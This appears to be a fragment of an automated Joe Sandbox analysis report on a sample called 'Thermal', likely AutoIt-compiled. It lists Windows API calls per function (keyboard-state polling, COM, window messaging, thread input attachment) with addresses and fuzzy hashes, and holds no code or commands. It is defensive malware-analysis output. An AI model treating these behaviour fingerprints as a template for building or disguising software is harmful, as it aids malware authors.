                                                      • Opcode Fuzzy Hash: 0717ba7371e6878a0bd5e3ee63f24827c7f660b1654216f76f840cc87ceb9a9d
                                                      • Instruction Fuzzy Hash: 99618D79904248AFDB11DFA4CC85EEE77F8EB09710F10019AFA14AB2E1D771AE41DB60
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001777DD
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00177836
                                                      • VariantInit.OLEAUT32(?), ref: 00177848
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00177868
                                                      • VariantCopy.OLEAUT32(?,?), ref: 001778BB
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 001778CF
                                                      • VariantClear.OLEAUT32(?), ref: 001778E4
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 001778F1
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001778FA
                                                      • VariantClear.OLEAUT32(?), ref: 0017790C
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00177917
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: f1313fdbae8f51cc8074cb5e53796a571cbad9ad224f7f3edc3b96c36735ebf0
                                                      • Instruction ID: c8744a88f3859157527a4e09f7f7674964a7fb2d521bb9726fefd7b05916b978
                                                      • Opcode Fuzzy Hash: f1313fdbae8f51cc8074cb5e53796a571cbad9ad224f7f3edc3b96c36735ebf0
                                                      • Instruction Fuzzy Hash: C5418335A00219DFCB05DFA4D8489EEBBB9FF18354F00C169E955A7261C730EA95CF90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00180530
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 001805B1
                                                      • GetKeyState.USER32(000000A0), ref: 001805CC
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 001805E6
                                                      • GetKeyState.USER32(000000A1), ref: 001805FB
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00180613
                                                      • GetKeyState.USER32(00000011), ref: 00180625
                                                      • GetAsyncKeyState.USER32(00000012), ref: 0018063D
                                                      • GetKeyState.USER32(00000012), ref: 0018064F
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00180667
                                                      • GetKeyState.USER32(0000005B), ref: 00180679
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: ae6ded5d8008f5560649ce4a3d05ddf6966906ae13bf2e5704c893a87ee2cbfb
                                                      • Instruction ID: d7fbe49775f1caf287de92c9025abbdb7914a8bd98d5a7006643d45b10cb3a0f
                                                      • Opcode Fuzzy Hash: ae6ded5d8008f5560649ce4a3d05ddf6966906ae13bf2e5704c893a87ee2cbfb
                                                      • Instruction Fuzzy Hash: 7241A5705047CE6DFFB3AA6488043B6BEA06B59304F18415ED5C6465C1FBA49BDCCFA2
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CoInitialize.OLE32 ref: 00198AED
                                                      • CoUninitialize.OLE32 ref: 00198AF8
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,001B3BBC,?), ref: 00198B58
                                                      • IIDFromString.OLE32(?,?), ref: 00198BCB
                                                      • VariantInit.OLEAUT32(?), ref: 00198C65
                                                      • VariantClear.OLEAUT32(?), ref: 00198CC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: da94288066cf750f106374abed8ccf0300a799bcde4782a3f515af65e8ec5781
                                                      • Instruction ID: ee746e8f7fc6c9306117b4ba7b9ea56ef81365e97e7e73336d1217cadcf94d31
                                                      • Opcode Fuzzy Hash: da94288066cf750f106374abed8ccf0300a799bcde4782a3f515af65e8ec5781
                                                      • Instruction Fuzzy Hash: 706190706087119FCB10DF54D885F9BB7E8EF59714F044859F5869B291CB70ED44CBA2
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0018BB13
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0018BB89
                                                      • GetLastError.KERNEL32 ref: 0018BB93
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0018BC00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 81cc16dbe0140dd744b0200b3fa1a40072fc12754b90f0310688ec8b03fab7f7
                                                      • Instruction ID: 9a6e3c091a9cbca56715aaccd57ea9eeca8b81de4cf401ba0c24447d045ff7b9
                                                      • Opcode Fuzzy Hash: 81cc16dbe0140dd744b0200b3fa1a40072fc12754b90f0310688ec8b03fab7f7
                                                      • Instruction Fuzzy Hash: 0631C135A04209AFCB10EF68C8D5EAEB7B4EF54310F14816AE806D73D5DB709A41CF91
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00179BCC
                                                      • GetDlgCtrlID.USER32 ref: 00179BD7
                                                      • GetParent.USER32 ref: 00179BF3
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00179BF6
                                                      • GetDlgCtrlID.USER32(?), ref: 00179BFF
                                                      • GetParent.USER32(?), ref: 00179C1B
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00179C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: b92fe9a8c106154d9019df21dd2fcdd1bb0d0512032b08ebfba38a55344d0b87
                                                      • Instruction ID: e920427713ea020530fecfe8e732b4b47e477804506a6cdc7945ad7c68e98f25
                                                      • Opcode Fuzzy Hash: b92fe9a8c106154d9019df21dd2fcdd1bb0d0512032b08ebfba38a55344d0b87
                                                      • Instruction Fuzzy Hash: 6121D3B0900204BFCF05EB60CC85EFEBBB5EFA9310F104256F965972D1DB7459589B20
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 0017B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0017B7BD
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00179CB5
                                                      • GetDlgCtrlID.USER32 ref: 00179CC0
                                                      • GetParent.USER32 ref: 00179CDC
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00179CDF
                                                      • GetDlgCtrlID.USER32(?), ref: 00179CE8
                                                      • GetParent.USER32(?), ref: 00179D04
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00179D07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 7688e4a3fcc9958c3f72bdd4aee1bcb4cbc6b37f5d9f7a88f6c5fb351efbc8ce
                                                      • Instruction ID: 6955f195240c10bce06b114281ac7af32f818e7ae1aa51fc6bf8bfc26fda24d5
                                                      • Opcode Fuzzy Hash: 7688e4a3fcc9958c3f72bdd4aee1bcb4cbc6b37f5d9f7a88f6c5fb351efbc8ce
                                                      • Instruction Fuzzy Hash: 0B21D0B1A40204BBDF15EBA0CC85EFEBBB9EF98300F104112F95197291DB7589689A20
                                                      APIs
                                                      • GetParent.USER32 ref: 00179D27
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00179D3C
                                                      • _wcscmp.LIBCMT ref: 00179D4E
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00179DC9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: b5f86e1c3f4e2ee8930e3d6edd81fd07b256599b9160729a737c7da203bfb1b8
                                                      • Instruction ID: 035cbfbb8a6247e55f172ec4082acd8d578ac54fa16dcbb8b2fe93481fe42279
                                                      • Opcode Fuzzy Hash: b5f86e1c3f4e2ee8930e3d6edd81fd07b256599b9160729a737c7da203bfb1b8
                                                      • Instruction Fuzzy Hash: 111155B6248302BEFA256760FC07DA773ACCF15720F204113FA28A00E1FFA66E550990
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00198FC1
                                                      • CoInitialize.OLE32(00000000), ref: 00198FEE
                                                      • CoUninitialize.OLE32 ref: 00198FF8
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 001990F8
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00199225
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,001B3BDC), ref: 00199259
                                                      • CoGetObject.OLE32(?,00000000,001B3BDC,?), ref: 0019927C
                                                      • SetErrorMode.KERNEL32(00000000), ref: 0019928F
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0019930F
                                                      • VariantClear.OLEAUT32(?), ref: 0019931F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: 0e93b7bd932672f13e8fee2a2e1a590e7ae603f2db0b9518fb23bf65e2952b0a
                                                      • Instruction ID: 22d8069aceeae31965b9d431efe7be95a404ee926dda5c8f20202baa6d60d80e
                                                      • Opcode Fuzzy Hash: 0e93b7bd932672f13e8fee2a2e1a590e7ae603f2db0b9518fb23bf65e2952b0a
                                                      • Instruction Fuzzy Hash: 4EC133B1608305AFDB00DF68C88496BB7E9FF89348F00491DF98A9B251DB71ED45CB92
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 001819EF
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181A03
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00181A0A
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A19
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00181A2B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A44
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00180A67,?,00000001), ref: 00181A56
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181A9B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181AB0
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00180A67,?,00000001), ref: 00181ABB
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: c448d0b9684593a531815f82098f707f051421b87db6e9091eda46437c9162f2
                                                      • Instruction ID: e579f2ab0b790acae9be60a97e6e4d087b7ee7db9b6bd5a171d30f10ab84ecac
                                                      • Opcode Fuzzy Hash: c448d0b9684593a531815f82098f707f051421b87db6e9091eda46437c9162f2
                                                      • Instruction Fuzzy Hash: 8831BF72501284BFDB15AF94DD84FAA77AEBB58315F104215F808DB590DBB49EC28F50
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 0012260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00122617
                                                      • SetBkMode.GDI32(?,00000001), ref: 0012262C
                                                      • GetStockObject.GDI32(00000005), ref: 00122634
                                                      • GetClientRect.USER32(?), ref: 0015C0FC
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0015C113
                                                      • GetWindowDC.USER32(?), ref: 0015C11F
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0015C12E
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015C140
                                                      • GetSysColor.USER32(00000005), ref: 0015C15E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                      • String ID:
                                                      • API String ID: 3430376129-0
                                                      • Opcode ID: 7dcdac1b62f7c296fa243bbdcfa72629155901a37f54425471593486209c30e4
                                                      • Instruction ID: 52b8f0ff08c35dd9945ec59c67621a5740fdbd8b73688445cfd8fdcb2ada1996
                                                      • Opcode Fuzzy Hash: 7dcdac1b62f7c296fa243bbdcfa72629155901a37f54425471593486209c30e4
                                                      • Instruction Fuzzy Hash: 26115E31500205FFDB625FA4EC48BEA7BB1EB08322F104365FA65994E1CB3149A1EF50
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0012ADE1
                                                      • OleUninitialize.OLE32(?,00000000), ref: 0012AE80
                                                      • UnregisterHotKey.USER32(?), ref: 0012AFD7
                                                      • DestroyWindow.USER32(?), ref: 00162F64
                                                      • FreeLibrary.KERNEL32(?), ref: 00162FC9
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00162FF6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 5dafc25f1a4052095e555d496f848ccaf7587dfebe6a626f0f4d3c4bd95eb74c
                                                      • Instruction ID: ee83a6458644a06cb91ab24b03bf46d7ce71b92dc326c9c37c99e796efeb41be
                                                      • Opcode Fuzzy Hash: 5dafc25f1a4052095e555d496f848ccaf7587dfebe6a626f0f4d3c4bd95eb74c
                                                      • Instruction Fuzzy Hash: 53A17C30701222CFCB29EF54D995A29F765FF14700F5142ADF90AAB261CB31AD66CF91
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0017B13A), ref: 0017B078
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: 60d666de31c5bd9f2aa935c1f35d806ee8700f58499e2bc678f22dd4e2369993
                                                      • Instruction ID: ddd1d87e8cf46b609f6cbd253ec11b12eeb1275369d8d4c36a3e09a30a231586
                                                      • Opcode Fuzzy Hash: 60d666de31c5bd9f2aa935c1f35d806ee8700f58499e2bc678f22dd4e2369993
                                                      • Instruction Fuzzy Hash: 4491A770A04605EACB18EFA0C481BEEFB75BF54304F94C11AE96EA7251DF30A959CB91
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 0012327E
                                                        • Part of subcall function 0012218F: GetClientRect.USER32(?,?), ref: 001221B8
                                                        • Part of subcall function 0012218F: GetWindowRect.USER32(?,?), ref: 001221F9
                                                        • Part of subcall function 0012218F: ScreenToClient.USER32(?,?), ref: 00122221
                                                      • GetDC.USER32 ref: 0015D073
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0015D086
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015D094
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0015D0A9
                                                      • ReleaseDC.USER32(?,00000000), ref: 0015D0B1
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0015D13C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 9b5ac9ded4444a5f5deaf670e3c7d4a337743656e7ce4809f1f3713f2ca46f37
                                                      • Instruction ID: 0d7530a864f2d718a66840d6fb0592f553de2586aded42e24cf83f45fa9cc3d0
                                                      • Opcode Fuzzy Hash: 9b5ac9ded4444a5f5deaf670e3c7d4a337743656e7ce4809f1f3713f2ca46f37
                                                      • Instruction Fuzzy Hash: 9E710030500205EFCF35CF64E884AAA7BB6FF49322F144269FD655E1A6C7318896DF60
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                        • Part of subcall function 00122714: GetCursorPos.USER32(?), ref: 00122727
                                                        • Part of subcall function 00122714: ScreenToClient.USER32(001E77B0,?), ref: 00122744
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000001), ref: 00122769
                                                        • Part of subcall function 00122714: GetAsyncKeyState.USER32(00000002), ref: 00122777
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 001AC69C
                                                      • ImageList_EndDrag.COMCTL32 ref: 001AC6A2
                                                      • ReleaseCapture.USER32 ref: 001AC6A8
                                                      • SetWindowTextW.USER32(?,00000000), ref: 001AC752
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001AC765
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 001AC847
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 1924731296-2107944366
                                                      • Opcode ID: 02017b93d787d83801c91b35583b065b71abaf847c8947cdaf27e23af23b07e2
                                                      • Instruction ID: 3168f393805a2519047e0ec0b1108fa3620537af05789a396c52d0c970f58d7a
                                                      • Opcode Fuzzy Hash: 02017b93d787d83801c91b35583b065b71abaf847c8947cdaf27e23af23b07e2
